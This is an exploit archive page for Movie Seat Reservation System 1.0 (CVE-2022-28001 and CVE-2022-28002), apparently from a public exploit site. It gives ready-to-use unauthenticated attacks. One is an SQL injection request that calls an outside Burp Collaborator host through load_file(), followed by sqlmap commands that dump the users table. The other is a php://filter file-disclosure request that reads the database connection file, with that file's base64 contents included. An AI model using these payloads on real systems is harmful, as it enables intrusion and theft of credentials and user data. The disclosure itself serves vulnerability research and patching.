Movie Seat Reservation System 1.0 File Disclosure / SQL Injection

Movie Seat Reservation System 1.0 File Disclosure / SQL Injection: Posted Apr 8, 2022; Authored by D4rkP0w4r | Site github.com; Movie Seat Reservation System version 1.0 suffers from file disclosure and remote SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, sql injection, info disclosure; advisories | CVE-2022-28001, CVE-2022-28002; SHA-256 | b0d1811617821f2291d86478668c606d13b486a7127827aba39ddb2c34fedaaf; Download | Favorite | View

Movie Seat Reservation System 1.0 File Disclosure / SQL Injection

# Movie Seat Reservation System Sql Injection
# Author: D4rkP0w4r
* Note => exploit don't need login account

# Exploit 
* Use Burp Suite capture request with payload

GET /Movie_Seat_Reservation_System/index.php?page=reserve&id=(select%20load_file('%5c%5c%5c%5coumvuo0qifuf18d8xd3vrtn81z7svqjhl5cs3gs.burpcollaborator.net%5c%5cbxr')) HTTP/1.1
Host: 192.168.1.101:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Connection: close
Cache-Control: max-age=0

Then save as moviesqli.txt

* Exploit with Sqlmap
python3 sqlmap.py -r moviesqli.txt --current-user
python3 sqlmap.py -r moviesqli.txt  --batch -dbs
python3 sqlmap.py -r moviesqli.txt  --batch -tables -D theater_db
python3 sqlmap.py -r moviesqli.txt  --batch -columns -D theater_db -T users -dump

# Vulnerable Code

* No filter id when inserting data to database


-------

# Movie Seat Reservation System File Disclosure
# Author: D4rkP0w4r
* Note => don't need login 

# Exploit 
* Exploit with Burp Suite 
http://192.168.1.101:8080/Movie_Seat_Reservation_System/index.php?page=home
* Use Burp Suite capture request and payload => Send
* Then decode Base64 PD9waHAgDQoNCiRjb25uPSBuZXcgbXlzcWxpKCdsb2NhbGhvc3QnLCdyb290JywnJywndGhlYXRlcl9kYicpb3IgZGllKCJDb3VsZCBub3QgY29ubmVjdCB0byBteXNxbCIubXlzcWxpX2Vycm9yKCRjb24pKTsNCg==    

# POC 
* Request
GET /Movie_Seat_Reservation_System/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1
Host: 192.168.1.101:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.101:8080/Movie_Seat_Reservation_System/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=0722dtqnb1dgvuono8uubajcae
Connection: close

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Movie Seat Reservation System 1.0 File Disclosure / SQL Injection

Movie Seat Reservation System 1.0 File Disclosure / SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Movie Seat Reservation System 1.0 File Disclosure / SQL Injection

Share This

Movie Seat Reservation System 1.0 File Disclosure / SQL Injection

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems